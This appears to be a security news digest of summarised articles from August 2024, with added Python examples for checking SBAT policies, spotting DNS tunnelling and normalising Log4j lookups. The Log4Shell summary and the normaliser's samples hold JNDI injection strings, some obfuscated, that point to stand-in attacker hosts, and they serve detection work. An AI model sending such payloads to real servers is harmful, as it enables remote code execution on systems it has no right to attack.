Daily Brief

Article summaries below are machine-generated.

2024-08-20 16:32:59 bleepingcomputer MISCELLANEOUS Windows Update Disrupts Dual Boot Functionality on Linux Systems
August 2024 Windows updates have broken dual boot on Linux systems with Secure Boot enabled. The updates apply a Secure Boot Advanced Targeting (SBAT) revocation intended to block Linux boot loaders that are not patched against CVE-2022-2601, a GRUB2 vulnerability. Shim enforces the revocation by comparing the generation numbers in a loader's .sbat section against the SbatLevel policy stored in firmware, which is why affected systems fail with errors such as "Verifying shim SBAT data failed" and "Security Policy Violation". Microsoft's advisory says the SBAT update is not applied to systems detected as dual-boot, but user reports suggest otherwise: numerous Linux users report that their systems no longer boot, and Ubuntu, Linux Mint, Zorin OS, and Puppy Linux are among the distributions reportedly affected. Deleting the SBAT policy or reinstalling Windows has not resolved the problem for users who tried it. The only workaround reported to work is to disable Secure Boot, update the Linux installation, and then re-enable Secure Boot. Microsoft has not officially acknowledged that the August 2024 updates can prevent dual-boot systems from booting.
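Worked example, added here and not taken from the article, Microsoft, or the shim project, of the check shim performs when it validates a loader's SBAT data (the check behind the "Verifying shim SBAT data" error above): a loader is refused if its .sbat section lists a component whose generation number is lower than the generation the SbatLevel policy demands. The loader and policy CSV below are constructed for illustration; on a real machine the loader's section can be dumped with `objcopy -O binary --only-section=.sbat grubx64.efi /dev/stdout` and the active policy read with `mokutil --sbat` (recent mokutil) or from the SbatLevel EFI variable.

```python
"""Check an EFI binary's SBAT section against an SBAT revocation policy.

Added example; it mirrors the rule shim applies at boot, it is not shim's
own code. Components the binary does not list are not checked; a listed
component is revoked when its generation is below the policy's.
"""
import csv
import io


def parse_sbat(text):
    """Parse SBAT CSV ('component,generation,...') into {component: generation}.

    Only the first two columns matter for revocation; the vendor name,
    package, version and URL columns of a .sbat section are ignored, and
    blank or malformed lines are skipped.
    """
    generations = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 2 or not row[0].strip():
            continue
        try:
            generations[row[0].strip()] = int(row[1])
        except ValueError:
            continue
    return generations


def revoked_components(binary_sbat, policy_sbat):
    """Return [(component, binary_generation, required_generation)] for every
    entry that would make shim refuse the binary under the given policy."""
    binary = parse_sbat(binary_sbat)
    policy = parse_sbat(policy_sbat)
    return [
        (name, binary[name], required)
        for name, required in policy.items()
        if name in binary and binary[name] < required
    ]


def boots_under_policy(binary_sbat, policy_sbat):
    """True when the policy revokes nothing in the binary's SBAT data."""
    return not revoked_components(binary_sbat, policy_sbat)


# Constructed sample data; generation numbers are chosen for illustration and
# are not the values of any particular distribution or of Microsoft's update.
# An unpatched GRUB2 build, as an older install image might ship it:
OLD_GRUB_SBAT = (
    "sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md\n"
    "grub,2,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/\n"
    "grub.example,1,Example Distro,grub2,2.06-1,https://example.invalid/\n"
)
# The same loader after the distribution rebuilt it with the security fixes:
NEW_GRUB_SBAT = OLD_GRUB_SBAT.replace("grub,2,", "grub,3,")
# A revocation policy of the kind an SBAT update writes into SbatLevel
# (the 'shim' line is ignored for a loader that does not declare shim):
POLICY = "sbat,1,2024010900\nshim,2\ngrub,3\n"

if __name__ == "__main__":
    for label, sbat in (("old", OLD_GRUB_SBAT), ("patched", NEW_GRUB_SBAT)):
        hits = revoked_components(sbat, POLICY)
        verdict = "boots" if not hits else "Security Policy Violation"
        print(f"{label} loader: {verdict} {hits}")
```

The practical use is the diagnosis step the article's affected users lacked: dump the .sbat section of the loader that fails to boot, read the SbatLevel policy the Windows update installed, and run them through `revoked_components` to see exactly which component and generation is being refused, which tells you whether updating the distribution's GRUB package will be enough.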
2024-08-20 15:21:25 bleepingcomputer CYBERCRIME Hacker Compromises Unicoin's Google Workspace, Locks Out Staff
Unicoin's Google Workspace was hacked, resulting in a company-wide lockout affecting all employee accounts. The unidentified hacker altered passwords, denying access to essential services like Gmail and Google Drive for four days. The security breach was detected on August 9, 2024, and access was restored on August 13, 2024. During the lockout period, the hacker had potential access to confidential internal communications and data. Unicoin has submitted a report to the U.S. Securities and Exchange Commission detailing the incident. The extent of data accessed and manipulated is under investigation, though initial findings indicate attempts at fraud. Despite the breach, Unicoin asserts the incident will not materially impact its financial health or result in asset losses.
2024-08-20 14:33:49 theregister DATA BREACH FlightAware Exposes User Data Including SSNs for Three Years
FlightAware disclosed a data breach caused by a configuration error that exposed user details from January 1, 2021, until the error was detected on July 25, 2024. Exposed data included user IDs, passwords, email addresses, full names, addresses, IP addresses, social media accounts, telephone numbers, year of birth, the last four digits of credit card numbers, information about owned aircraft, industry title, pilot status, account activity, and Social Security Numbers. FlightAware has not said how many users were affected, but it has 12 million registered users, all of whom may be. On discovering the problem, FlightAware corrected the configuration and is requiring all potentially affected users to reset their passwords at their next login. Affected users are being offered two years of free credit monitoring through Equifax. FlightAware apologized and reiterated its commitment to user privacy, but it has not said whether the exposed data was actually accessed or misused by unauthorized parties.
2024-08-20 12:00:57 bleepingcomputer NATION STATE ACTIVITY U.S. Warns of Escalated Iranian Cyber Operations Against Elections
The U.S. government has issued warnings about Iranian hackers intensifying cyber operations to influence the upcoming elections by targeting presidential campaigns and the American public. Joint statements from the ODNI, FBI, and CISA highlight Iran's attempts to access sensitive U.S. election-related information and undermine trust in democratic institutions. Iranian state-backed actors are confirmed to have breached former President Trump's campaign, stealing and leaking confidential data. Microsoft and OpenAI have reported increased malicious activities by Iran, including password spraying, spear-phishing, and misuse of AI tools like ChatGPT for spreading misinformation. Meta's report ranks Iran as a major source of foreign electoral interference, second only to Russia, and details disruptions to multiple Iranian coordinated inauthentic behavior clusters. U.S. authorities continue to assure the public of the resilience of the electoral process against cyber threats, including those targeting voting infrastructure.
2024-08-20 10:29:08 thehackernews MALWARE Stealthy Msupedge Backdoor Targets University via PHP Flaw
A previously undocumented backdoor named Msupedge was used in an attack on an unnamed university in Taiwan. The intrusion most likely exploited a critical PHP vulnerability (CVE-2024-4577) to gain remote code execution and deploy the backdoor. Msupedge communicates with its command-and-control (C&C) server over DNS, using DNS tunneling rather than conventional web traffic. The backdoor is a DLL dropped into specific system paths and loaded by the Apache HTTP server (httpd). Commands are encoded in the IP address the C&C server returns when the backdoor resolves a name, and that value dictates what the backdoor does next. Symantec's report notes that the attackers' objectives and origins remain unknown. The DNS-based channel and the backdoor's stealth features point to a carefully engineered tool. The article also highlights the emerging threat actor UTG-Q-010, which distributes the Pupy RAT using job- and cryptocurrency-themed phishing lures.
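A detection example, added here and not code from Symantec or from the malware, for the behaviour described above: a backdoor that tunnels its traffic over DNS has to encode data in the names it queries, so on the resolver side it shows up as a burst of distinct, long, high-entropy subdomains under one parent domain, and when the reply address is the downlink channel the answers vary from query to query as well. The log lines and the `timestamp client qname qtype answer` layout are constructed for this example; adapt `parse_log` to your resolver's format. The parent-domain extraction is a simplification (last two labels) that a production version should replace with the Public Suffix List.

```python
"""Flag DNS-tunnelling candidates in resolver logs by per-domain subdomain
volume and label entropy. Added example; constructed sample data."""
import math
from collections import defaultdict

# Constructed sample: ordinary lookups mixed with a tunnelling burst.
SAMPLE_LOG = """\
2024-08-20T10:01:02Z 10.0.5.17 www.example.com A 93.184.216.34
2024-08-20T10:01:05Z 10.0.5.17 mail.example.com A 93.184.216.35
2024-08-20T10:01:07Z 10.0.5.17 6a1f0c9e3b7d4a.update-cdn.invalid A 10.20.3.7
2024-08-20T10:01:09Z 10.0.5.17 9c2e7b41d0f8a3.update-cdn.invalid A 10.20.5.7
2024-08-20T10:01:11Z 10.0.5.17 e4d8a27c5b1f90.update-cdn.invalid A 10.20.3.7
2024-08-20T10:01:13Z 10.0.5.17 b7f13e0a6d2c48.update-cdn.invalid A 10.20.9.7
2024-08-20T10:01:15Z 10.0.5.17 0d5c4a9e8b3f17.update-cdn.invalid A 10.20.3.7
2024-08-20T10:01:17Z 10.0.5.17 f82b6d3c1e0a95.update-cdn.invalid A 10.20.1.7
2024-08-20T10:01:20Z 10.0.5.17 cdn.example.com A 93.184.216.36
"""


def shannon_entropy(s):
    """Bits per character; random hex/base32 labels score well above 3.0."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Yield (client, qname, answer) from the constructed log layout."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 5:
            yield parts[1], parts[2].rstrip(".").lower(), parts[4]


def registered_domain(qname):
    # Simplification: last two labels. Use the Public Suffix List in
    # production so that co.uk, com.tw, etc. are handled correctly.
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def tunnelling_candidates(text, min_unique=5, min_entropy=3.0, min_len=10):
    """Return one record per parent domain whose subdomain traffic looks like
    an encoded channel: many distinct subdomains, long and high-entropy
    leftmost labels. `distinct_answers` is reported because a varying reply
    address is the other half of a tunnel like the one described above."""
    subdomains = defaultdict(set)
    answers = defaultdict(set)
    for _client, qname, answer in parse_log(text):
        parent = registered_domain(qname)
        if qname == parent:
            continue
        subdomains[parent].add(qname[: -len(parent) - 1])
        answers[parent].add(answer)

    flagged = []
    for parent, subs in subdomains.items():
        if len(subs) < min_unique:
            continue
        labels = [s.split(".")[0] for s in subs]
        mean_len = sum(map(len, labels)) / len(labels)
        mean_entropy = sum(map(shannon_entropy, labels)) / len(labels)
        if mean_len >= min_len and mean_entropy >= min_entropy:
            flagged.append({
                "domain": parent,
                "unique_subdomains": len(subs),
                "distinct_answers": len(answers[parent]),
                "mean_entropy": mean_entropy,
            })
    return flagged


def flagged_domains(text, **thresholds):
    return [rec["domain"] for rec in tunnelling_candidates(text, **thresholds)]


if __name__ == "__main__":
    for rec in tunnelling_candidates(SAMPLE_LOG):
        print(rec)
```

The thresholds are deliberately conservative defaults; tune `min_unique` against a baseline of your own resolver logs, since CDNs and some telemetry services also produce many unique subdomains, though usually with low-entropy, structured labels.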
2024-08-20 10:08:35 thehackernews MALWARE Sophisticated Log4Shell Attack: Guarding with ADR Technology
The article, from Contrast Security, walks through the stages of a Log4Shell attack against a Java application and argues for Application Detection and Response (ADR) as the defense. Log4Shell abuses the lookup feature of the widely used Log4j logging framework: an attacker gets a string such as ${jndi:ldap://attacker-host/x} written to a log, Log4j performs a Java Naming and Directory Interface (JNDI) lookup against the attacker's server, and the response leads the application to load attacker-controlled code. The article describes the attack as multi-stage, combining JNDI injection, Expression Language (EL) injection, and command execution. ADR integrates with the application's runtime to observe these operations directly and to detect and block the malicious actions at each stage, and Contrast positions its ADR product as preventing and mitigating the Log4Shell stages in this way. It also integrates with SIEM, SOAR, and XDR systems for broader threat management. The business benefits claimed include an improved security posture, compliance with regulations such as PCI DSS and GDPR, and a reduced risk of serious breaches.
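An added example, not Contrast's code and not the Log4j implementation, of the part of the attack that makes log-side detection harder than it looks: Log4j evaluates lookups innermost-first, so `${${lower:j}ndi:...}` becomes `${jndi:...}` only at the moment it is logged, and a scanner that greps for the literal `${jndi:` misses it. The function below replays that evaluation order for the lookups an attacker uses to obfuscate (lower, upper, and the `:-` default-value syntax), treats every other lookup as unresolved the way a hardened deployment would, and reports the JNDI targets that a vulnerable Log4j 2.x would have contacted. The request lines it is run on are constructed.

```python
"""Normalise Log4j lookup nesting and report JNDI targets. Added example."""
import re

# An innermost lookup has no '$', '{' or '}' inside the braces.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Sentinels that cannot appear in ordinary log text mark a resolved jndi lookup
# so it is never expanded again and its extent survives later substitutions.
_JNDI_START = "\x00jndi:"
_JNDI_END = "\x00"


def _evaluate(content):
    """Evaluate one innermost lookup for the subset that matters to detection.

    lower/upper transform their argument, jndi is recorded, and anything else
    (env, sys, date, hostName, ...) is treated as unresolved, which yields the
    ':-' default when one is given and an empty string otherwise.
    """
    default = None
    if ":-" in content:
        content, default = content.split(":-", 1)
    name, _, key = content.partition(":")
    name = name.strip().lower()
    if name == "lower":
        return key.lower()
    if name == "upper":
        return key.upper()
    if name == "jndi":
        return _JNDI_START + key + _JNDI_END
    return default if default is not None else ""


def normalize(text):
    """Resolve lookups innermost-first until none remain, as Log4j does."""
    while True:
        match = _LOOKUP.search(text)
        if not match:
            return text
        text = text[: match.start()] + _evaluate(match.group(1)) + text[match.end():]


def find_jndi(text):
    """Return the JNDI targets (e.g. 'ldap://host/x') a vulnerable Log4j
    would have contacted if `text` were logged; [] for benign input."""
    return re.findall(r"\x00jndi:([^\x00]*)\x00", normalize(text))


# Constructed sample request lines: the first two are what a naive
# '${jndi:' substring check catches and misses respectively.
SAMPLES = [
    "GET /login?user=${jndi:ldap://evil.example/a} HTTP/1.1",
    "GET /login?user=${${lower:j}${upper:n}di:${::-l}dap://evil.example/a} HTTP/1.1",
    "User-Agent: ${${env:NOPE:-j}ndi:rmi://evil.example/x}",
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) ${date:yyyy}",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{'naive hit' if '${jndi:' in line else 'naive miss':>10} | "
              f"targets={find_jndi(line)} | {line}")
```

The point for a detection engineer is the comparison the main block prints: the substring check fires only on the first line, while the normalised check also flags the two obfuscated variants and stays quiet on the benign fourth line.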
2024-08-20 09:37:54 thehackernews CYBERCRIME Critical Security Flaw Found in Azure Kubernetes Services
Cybersecurity researchers disclosed a privilege escalation flaw in Microsoft Azure Kubernetes Services (AKS) that let an attacker with command execution inside a pod read every secret in the cluster. The flaw affected clusters configured with Azure CNI for network configuration and Azure for network policy. From the pod, the attacker could reach the Azure WireServer (the node's metadata endpoint at 168.63.129.16) to obtain the key protecting the node's provisioning data, decrypt the provisioning script, and recover the secrets embedded in it, including the TLS bootstrap token; that token is intended for nodes joining the cluster and can be used to obtain node credentials and read all cluster secrets, with no need for root in the pod. Microsoft fixed the issue after responsible disclosure by Google-owned Mandiant. Mandiant recommends restrictive NetworkPolicies that limit pod egress to the services a workload actually needs, which blocks the exploit path by denying pods access to the WireServer. The disclosure coincides with other recent high-severity vulnerabilities in Kubernetes components such as ingress-nginx and git-sync, underlining the ongoing security challenges in Kubernetes environments.
2024-08-20 09:07:04 thehackernews NATION STATE ACTIVITY Iranian Cyber Group TA453 Uses New Malware to Target Jewish Leader
Iranian state-sponsored actors tracked as TA453 by Proofpoint (and under various other names by other vendors) ran a targeted spear-phishing campaign against a prominent Jewish figure. The campaign began in late July 2024 with benign initial messages to build trust, followed by malicious links that delivered an intelligence-gathering malware named AnvilEcho. Proofpoint assesses that TA453 operates on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC) and that its campaigns serve Iranian political and military aims, with victims in the U.S., Israel, Iran, and the U.K. Its usual approach is to impersonate legitimate entities and use credible pretexts, such as an invitation to a podcast, to lure victims into downloading malware-laden documents or visiting phishing pages. AnvilEcho, delivered by the BlackSmith toolset, performs system reconnaissance, captures screenshots, downloads additional files, and exfiltrates data over FTP and to Dropbox. Consistent with IRGC intelligence priorities, TA453 targets politicians, human rights activists, and academics working on Middle East affairs. The campaign is part of broader Iranian cyber efforts against Israeli interests and follows the disclosure of another Iranian malware strain, pointing to continued development of state-sponsored tooling.
2024-08-20 06:34:19 theregister NATION STATE ACTIVITY Iran Accused of Targeting Trump Campaign in Phishing Attack
U.S. intelligence agencies, including ODNI, FBI, and CISA, identified Iran as likely involved in cyber operations aimed at the Trump presidential campaign. These operations were part of Iran’s broader intent to influence U.S. elections and weaken democratic processes, per the official joint statement. The incident involved spear-phishing emails believed to be from compromised accounts of a high-profile former Trump advisor, Roger Stone. The attack led to unauthorized access and subsequent leakage of sensitive campaign documents. Microsoft also reported that the phishing campaign targeted a high-ranking official within the Trump campaign. The U.S. intelligence community has reaffirmed their commitment to safeguarding upcoming elections against foreign interference, particularly calling out threats from both Russia and Iran. Recommended cybersecurity practices to mitigate such threats include using strong passwords, official emails for official duties, software updates, cautious handling of email links and attachments, and enabling multi-factor authentication.
2024-08-20 06:18:45 thehackernews NATION STATE ACTIVITY Blind Eagle Hackers Utilize Spear-Phishing to Target Latin America
Cybersecurity researchers profile Blind Eagle, an APT group active since 2018 that specializes in spear-phishing attacks across Latin America. Its targets include government, financial, energy, and oil and gas organizations in Colombia, Ecuador, Chile, and Panama. Blind Eagle delivers RATs such as AsyncRAT, BitRAT, and NjRAT via phishing emails that impersonate legitimate institutions and press recipients to act urgently. The links use geographic redirection to evade detection, so that only visitors from the targeted countries reach the payload, and the malware is delivered through a multi-stage chain involving VBS and DLL files. The group uses process hollowing to evade process-based defenses, showing its adaptability and technical sophistication. Recently it has used HijackLoader to distribute AsyncRAT, evidence of continued evolution and adoption of new tooling. Despite the relative simplicity of its techniques, Blind Eagle's operations are effective, posing an ongoing threat of cyber espionage and financial credential theft in the region.
2024-08-20 05:32:50 thehackernews DATA BREACH Thousands of NetSuite Sites Exposed to Customer Data Leaks
Cybersecurity researchers identified a misconfiguration affecting thousands of Oracle NetSuite SuiteCommerce e-commerce sites that exposes sensitive customer data. The issue arises when site owners create Custom Record Types (CRTs) with the access type "No Permission Required", which lets unauthenticated visitors retrieve those records through NetSuite's APIs if they know the CRT's name. Exposed data included customers' full addresses and mobile phone numbers. Aaron Costello of AppOmni recommends tightening the CRT's access type definition so that records are not publicly readable and setting field-level access on sensitive fields to "None". The same article also notes an unrelated issue in Microsoft Entra ID, highlighting risks in authentication flows for hybrid identity systems.
2024-08-20 04:57:03 thehackernews CYBERCRIME CISA Issues Alert on Jenkins Flaw Used in Ransomware Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical Jenkins vulnerability to its Known Exploited Vulnerabilities catalog because it is being exploited in ransomware operations. The flaw, CVE-2024-23897 (CVSS 9.8), is an arbitrary file read in the Jenkins command-line interface: the CLI's command parser expanded an argument beginning with "@" into the contents of the named file, and the read can be escalated to remote code execution. Sonar's security researchers reported it in January 2024, and Jenkins fixed it by disabling that parser feature. Trend Micro observed multiple attack attempts in March originating from several countries, along with remote code execution exploits being traded. Recent attacks leveraging the flaw were attributed to the IntelBroker threat actor and the RansomExx ransomware gang, targeting companies including BORN Group and Brontoo Technology Solutions. CloudSEK and Juniper Networks have documented real-world exploitation of CVE-2024-23897 to read arbitrary files on targeted servers. FCEB agencies must apply the available patches by September 9, 2024.
2024-08-20 03:35:17 bleepingcomputer NATION STATE ACTIVITY North Korean Lazarus Group Exploits Windows Driver Flaw
North Korea's Lazarus hacking group exploited a zero-day vulnerability in the Windows AFD.sys driver to install its FUDModule rootkit. Microsoft addressed the flaw, tracked as CVE-2024-38193, in its August 2024 Patch Tuesday updates, which also resolved seven other zero-day vulnerabilities. CVE-2024-38193 is a privilege escalation flaw in the Windows Ancillary Function Driver for WinSock (AFD.sys), the kernel driver behind the Winsock API, and exploiting it gave the attackers kernel-level access. The flaw was discovered by Gen Digital researchers, who noted that Lazarus used it to covertly disable Windows monitoring features. Because AFD.sys ships with Windows, the group did not need to bring its own vulnerable driver (BYOVD), the technique it had used in earlier attacks against Windows and Dell kernel drivers and one that security tools can detect and block. Lazarus's operations focus on financial gain to fund the North Korean government. There is a reward of up to $5 million for information on the DPRK hackers' malicious activities, as they pose a significant threat to global cybersecurity.
2024-08-20 01:33:02 theregister CYBERCRIME Researchers Expose Flaws in Digital Wallets Allowing Fraudulent Transactions
Digital wallets such as Apple Pay, Google Pay, and PayPal can be used to make unauthorized purchases with stolen or cancelled credit cards, according to new research from UMass Amherst and Penn State. The researchers found weaknesses in how banks and wallets authenticate card enrollment and refresh payment tokens, which let an attacker keep charging a victim's credit line even after the card is reported lost or cancelled. Using publicly available personal information, an attacker can pass the weaker verification method some banks offer when a card is added to a wallet. Once the stolen card is enrolled in the attacker's wallet, issuing banks fail to re-verify who holds the token when the card is reissued, so the token keeps working. Even locked or cancelled cards remain usable in a wallet because merchants' recurring transactions are handled improperly and bypass the checks applied to new purchases. Some banks and wallet providers have responded to the findings and are reportedly improving their controls. The researchers recommend stronger user verification at enrollment and continuous monitoring of token and transaction authenticity.
2024-08-19 20:53:08 bleepingcomputer DATA BREACH Toyota Confirms Data Breach After Hacker Forum Leaks Data
Toyota confirmed a breach of its systems after 240GB of data was leaked on a hacking forum. The leaked information includes details about Toyota employees and customers, financial records, and contracts. The threat actor, ZeroSevenGroup, claimed to have accessed Toyota's U.S. branch and used the ADRecon tool to collect extensive information from Active Directory. Toyota describes the incident as limited in scope and says its systems were not broadly affected. The company is engaging with affected parties to provide assistance, though it has not said how the breach was discovered or how much personal data was exposed. The leaked files were created or taken on December 25, 2022, which suggests the attacker accessed a backup server. The incident follows several other security incidents at Toyota in recent years, including a ransomware attack and multiple misconfigured cloud services.